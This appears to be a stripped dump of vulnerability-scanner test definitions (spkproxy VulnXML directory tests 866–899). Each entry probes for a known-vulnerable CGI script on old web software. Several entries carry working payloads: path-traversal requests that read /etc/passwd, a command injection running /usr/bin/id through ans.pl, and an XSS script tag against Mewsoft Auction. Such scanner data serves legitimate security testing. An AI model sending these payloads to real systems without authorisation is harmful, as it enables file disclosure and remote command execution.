(af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd) "AlienForm2 revision 1.5 allows any file to be read from the remote system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-866.xml0100664000076500007650000000710007566204543021666 0ustar davedave (aglimpse) "This CGI may allow attackers to execute remote commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}aglimpse HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-867.xml0100664000076500007650000000711007566204543021670 0ustar davedave (aglimpse.cgi) "This CGI may allow attackers to execute remote commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}aglimpse.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-868.xml0100664000076500007650000000742407566204543021701 0ustar davedave (Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0) "This CGI allows attackers to view arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ resolv\.conf 200 resolv\.conf 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-869.xml0100664000076500007650000000745407566204543021705 0ustar davedave (alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd) "AlienForm2 revision 1.5 allows any file to be read from the remote system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-870.xml0100664000076500007650000000712207566204543021665 0ustar davedave (amadmin.pl) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}amadmin.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-871.xml0100664000076500007650000000730407566204543021670 0ustar davedave (anacondaclip.pl?template=../../../../../../../../../../etc/passwd) "This allows attackers to read arbitrary files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}anacondaclip.pl?template=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-872.xml0100664000076500007650000000722207566204543021670 0ustar davedave (ans.pl?p=../../../../../usr/bin/id|&blah) "Avenger's News System allows commands to be issued remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ uid 200 uid 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-873.xml0100664000076500007650000000705407566204543021674 0ustar davedave (AnyBoard.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}AnyBoard.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-874.xml0100664000076500007650000000704207566204543021672 0ustar davedave (AnyForm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}AnyForm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-875.xml0100664000076500007650000000704407566204543021675 0ustar davedave (AnyForm2) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}AnyForm2 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-876.xml0100664000076500007650000000742207566204543021676 0ustar davedave (apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/) "This allows attackers to read arbitrary files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-877.xml0100664000076500007650000000717607566204543021705 0ustar davedave (architext_query.cgi) "Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}architext_query.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-878.xml0100664000076500007650000000717407566204543021704 0ustar davedave (architext_query.pl) "Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}architext_query.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-879.xml0100664000076500007650000000702507566204543021700 0ustar davedave (ash) "Shell found in CGI dir!" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ash HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-880.xml0100664000076500007650000000706007566204543021667 0ustar davedave (AT-admin.cgi) "Admin interface...no known holes" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}AT-admin.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-881.xml0100664000076500007650000000713407566204543021672 0ustar davedave (AT-generate.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}AT-generate.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-882.xml0100664000076500007650000001013107566204543021662 0ustar davedave (auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=) "Mewsoft Auction 3.0 from http://www.mewsoft.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir= HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-883.xml0100664000076500007650000000726207566204543021676 0ustar davedave (auktion.cgi?menue=../../../../../../../../../../etc/passwd) "The CGI allows attackers to read arbitrary files remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}auktion.cgi?menue=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-884.xml0100664000076500007650000000724007566204543021673 0ustar davedave (auth_data/auth_user_file.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}auth_data/auth_user_file.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-885.xml0100664000076500007650000000714607566204543021701 0ustar davedave (awl/auctionweaver.pl) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}awl/auctionweaver.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-886.xml0100664000076500007650000000715207566204543021677 0ustar davedave (awstats.pl) "Free realtime logfile analyzer for advanced web statistics. Should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}awstats.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Traffic 200 Traffic 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-887.xml0100664000076500007650000000705407566204543021701 0ustar davedave (ax-admin.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ax-admin.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-888.xml0100664000076500007650000000704007566204543021675 0ustar davedave (ax.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ax.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-889.xml0100664000076500007650000000704207566204543021700 0ustar davedave (axs.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}axs.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-890.xml0100664000076500007650000000716307566204543021674 0ustar davedave (badmin.cgi) "BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgrade." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}badmin.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-891.xml0100664000076500007650000000711007566204543021665 0ustar davedave (banner.cgi) "This CGI may allow attackers to read any file on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}banner.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-892.xml0100664000076500007650000000712407566204543021673 0ustar davedave (bannereditor.cgi) "This CGI may allow attackers to read any file on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bannereditor.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-893.xml0100664000076500007650000000702707566204543021676 0ustar davedave (bash) "Shell found in CGI dir!" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bash HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-894.xml0100664000076500007650000000731107566204543021673 0ustar davedave (bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd) "Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-895.xml0100664000076500007650000000730307566204543021675 0ustar davedave (bb-hist?HISTFILE=../../../../../../../../../../etc/passwd) "Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bb-hist?HISTFILE=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-896.xml0100664000076500007650000000713007566204543021674 0ustar davedave (bb-histlog.sh) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bb-histlog.sh HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-897.xml0100664000076500007650000000733307566204543021702 0ustar davedave (bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd) "Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-898.xml0100664000076500007650000000713007566204543021676 0ustar davedave (bbs_forum.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bbs_forum.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-899.xml0100664000076500007650000000744207566204543021705 0ustar davedave (bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK) "The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 